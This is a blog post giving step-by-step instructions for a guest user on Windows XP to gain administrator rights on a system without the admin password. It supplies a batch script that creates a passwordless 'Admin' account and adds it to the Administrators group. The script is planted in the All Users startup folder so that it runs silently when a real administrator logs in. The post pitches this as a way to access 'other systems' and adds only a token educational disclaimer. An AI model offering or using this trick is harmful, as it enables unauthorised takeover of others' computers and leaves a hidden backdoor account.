Home / Microsoft Windows / How to Create Admin Account in Windows XP being as Guest User

How to Create Admin Account in Windows XP being as Guest User

Do you want to gain access to other systems as an Admin user instead of a Guest user? If yes, then check out the below trick to access other systems as an admin using the Guest user login.

You can create an Admin account on any system without knowing the system Admin Password.

For this, you have to log in as a guest user on the system. Once you log onto the system as Guest User, then follow the below steps.

Please note: This trick is only for educational purposes and should not be used to harm others.

Create Admin Account in Windows XP being as Guest User:

1. Copy the below code and paste this to notepad and save it as admin.bat

echo off
net user Admin /add /expires:never /passwordreq:no
net localgroup "Administrators" /add Admin

Create Admin Account in Windows
2. We need to copy this file to the start-up folder of the system. Open Run Command, Go to Start –> Run Or (Press Win+R), copy the below path, and paste in the run command to directly go to the start-up folder.

%systemdrive%\Documents and Settings\All Users\Start Menu\Programs\Startup

Now, Copy the Admin.bat file to Start-up Folder.

Create Admin Account in Windows XP

That’s it, Now log off from the Guest user and wait for the Admin user to login into System.

When the admin Login to the system, the admin.bat file runs, and the admin account is created automatically. So, next time you log on to the system, you will see a new account named admin, and no password is set. Just click on Admin and you will have access to the system with admin rights.

Not Tested on Windows 7 and Above..

For the latest updates on Techie Inspire, Subscribe to Techie Inspire.

About Roshan Karkera

Roshan Karkera a.k.a. k.roshan. Blogger by passion and software engineer by profession. He believes in sharing knowledge, which made him to start his own blog. He is very much keen & passionate about new technology & Science. If you'd like to connect with him, follow at Google plus or Twitter.

Leave a Reply

Your email address will not be published.